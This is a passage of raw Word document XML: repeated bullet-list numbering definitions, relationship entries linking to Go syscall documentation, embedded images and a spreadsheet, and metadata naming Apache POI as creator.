      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288606">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288607">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288608">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288609">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288610">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288611">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288612">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288613">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2288614">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="2288501"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="2288502"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="2288503"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="2288504"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="2288505"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="2288506"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="2288507"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2288508"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="2288509"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="2288510"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="2288511"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2288512"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="2288513"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="2288514"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="2288515"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="2288516"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="2288517"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="2288518"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="2288519"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="2288520"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="2288521"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="2288522"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="2288523"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="2288524"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="2288525"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="2288526"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="2288527"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="2288528"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="2288529"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="2288530"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="2288531"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="2288532"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="2288533"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="2288534"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="2288535"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="2288536"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="2288537"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="2288538"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="2288539"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="2288540"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="2288541"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="2288542"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="2288543"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="2288544"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="2288545"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="2288546"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="2288547"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="2288548"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="2288549"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="2288550"/>
  </w:num>
  <w:num w:numId="51">
    <w:abstractNumId w:val="2288551"/>
  </w:num>
  <w:num w:numId="52">
    <w:abstractNumId w:val="2288552"/>
  </w:num>
  <w:num w:numId="53">
    <w:abstractNumId w:val="2288553"/>
  </w:num>
  <w:num w:numId="54">
    <w:abstractNumId w:val="2288554"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="2288555"/>
  </w:num>
  <w:num w:numId="56">
    <w:abstractNumId w:val="2288556"/>
  </w:num>
  <w:num w:numId="57">
    <w:abstractNumId w:val="2288557"/>
  </w:num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="2288558"/>
  </w:num>
  <w:num w:numId="59">
    <w:abstractNumId w:val="2288559"/>
  </w:num>
  <w:num w:numId="60">
    <w:abstractNumId w:val="2288560"/>
  </w:num>
  <w:num w:numId="61">
    <w:abstractNumId w:val="2288561"/>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="2288562"/>
  </w:num>
  <w:num w:numId="63">
    <w:abstractNumId w:val="2288563"/>
  </w:num>
  <w:num w:numId="64">
    <w:abstractNumId w:val="2288564"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="2288565"/>
  </w:num>
  <w:num w:numId="66">
    <w:abstractNumId w:val="2288566"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="2288567"/>
  </w:num>
  <w:num w:numId="68">
    <w:abstractNumId w:val="2288568"/>
  </w:num>
  <w:num w:numId="69">
    <w:abstractNumId w:val="2288569"/>
  </w:num>
  <w:num w:numId="70">
    <w:abstractNumId w:val="2288570"/>
  </w:num>
  <w:num w:numId="71">
    <w:abstractNumId w:val="2288571"/>
  </w:num>
  <w:num w:numId="72">
    <w:abstractNumId w:val="2288572"/>
  </w:num>
  <w:num w:numId="73">
    <w:abstractNumId w:val="2288573"/>
  </w:num>
  <w:num w:numId="74">
    <w:abstractNumId w:val="2288574"/>
  </w:num>
  <w:num w:numId="75">
    <w:abstractNumId w:val="2288575"/>
  </w:num>
  <w:num w:numId="76">
    <w:abstractNumId w:val="2288576"/>
  </w:num>
  <w:num w:numId="77">
    <w:abstractNumId w:val="2288577"/>
  </w:num>
  <w:num w:numId="78">
    <w:abstractNumId w:val="2288578"/>
  </w:num>
  <w:num w:numId="79">
    <w:abstractNumId w:val="2288579"/>
  </w:num>
  <w:num w:numId="80">
    <w:abstractNumId w:val="2288580"/>
  </w:num>
  <w:num w:numId="81">
    <w:abstractNumId w:val="2288581"/>
  </w:num>
  <w:num w:numId="82">
    <w:abstractNumId w:val="2288582"/>
  </w:num>
  <w:num w:numId="83">
    <w:abstractNumId w:val="2288583"/>
  </w:num>
  <w:num w:numId="84">
    <w:abstractNumId w:val="2288584"/>
  </w:num>
  <w:num w:numId="85">
    <w:abstractNumId w:val="2288585"/>
  </w:num>
  <w:num w:numId="86">
    <w:abstractNumId w:val="2288586"/>
  </w:num>
  <w:num w:numId="87">
    <w:abstractNumId w:val="2288587"/>
  </w:num>
  <w:num w:numId="88">
    <w:abstractNumId w:val="2288588"/>
  </w:num>
  <w:num w:numId="89">
    <w:abstractNumId w:val="2288589"/>
  </w:num>
  <w:num w:numId="90">
    <w:abstractNumId w:val="2288590"/>
  </w:num>
  <w:num w:numId="91">
    <w:abstractNumId w:val="2288591"/>
  </w:num>
  <w:num w:numId="92">
    <w:abstractNumId w:val="2288592"/>
  </w:num>
  <w:num w:numId="93">
    <w:abstractNumId w:val="2288593"/>
  </w:num>
  <w:num w:numId="94">
    <w:abstractNumId w:val="2288594"/>
  </w:num>
  <w:num w:numId="95">
    <w:abstractNumId w:val="2288595"/>
  </w:num>
  <w:num w:numId="96">
    <w:abstractNumId w:val="2288596"/>
  </w:num>
  <w:num w:numId="97">
    <w:abstractNumId w:val="2288597"/>
  </w:num>
  <w:num w:numId="98">
    <w:abstractNumId w:val="2288598"/>
  </w:num>
  <w:num w:numId="99">
    <w:abstractNumId w:val="2288599"/>
  </w:num>
  <w:num w:numId="100">
    <w:abstractNumId w:val="2288600"/>
  </w:num>
  <w:num w:numId="101">
    <w:abstractNumId w:val="2288601"/>
  </w:num>
  <w:num w:numId="102">
    <w:abstractNumId w:val="2288602"/>
  </w:num>
  <w:num w:numId="103">
    <w:abstractNumId w:val="2288603"/>
  </w:num>
  <w:num w:numId="104">
    <w:abstractNumId w:val="2288604"/>
  </w:num>
  <w:num w:numId="105">
    <w:abstractNumId w:val="2288605"/>
  </w:num>
  <w:num w:numId="106">
    <w:abstractNumId w:val="2288606"/>
  </w:num>
  <w:num w:numId="107">
    <w:abstractNumId w:val="2288607"/>
  </w:num>
  <w:num w:numId="108">
    <w:abstractNumId w:val="2288608"/>
  </w:num>
  <w:num w:numId="109">
    <w:abstractNumId w:val="2288609"/>
  </w:num>
  <w:num w:numId="110">
    <w:abstractNumId w:val="2288610"/>
  </w:num>
  <w:num w:numId="111">
    <w:abstractNumId w:val="2288611"/>
  </w:num>
  <w:num w:numId="112">
    <w:abstractNumId w:val="2288612"/>
  </w:num>
  <w:num w:numId="113">
    <w:abstractNumId w:val="2288613"/>
  </w:num>
  <w:num w:numId="114">
    <w:abstractNumId w:val="22886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https://cs.opensource.google/go/go/+/go1.21.5:src/syscall/exec_unix.go;l=266" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId21" Target="https://pkg.go.dev/syscall#Exec" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId22" Target="media/image16.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId23" Target="media/image17.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId24" Target="media/image18.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId25" Target="media/image19.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId26" Target="media/image20.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId27" Target="media/image21.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId28" Target="media/image22.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId29" Target="media/image23.jpe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.xlsx" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package"/><Relationship Id="rId31" Target="media/image24.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId32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2026-08-07T04:09:51Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
</cp:coreProperties>
</file>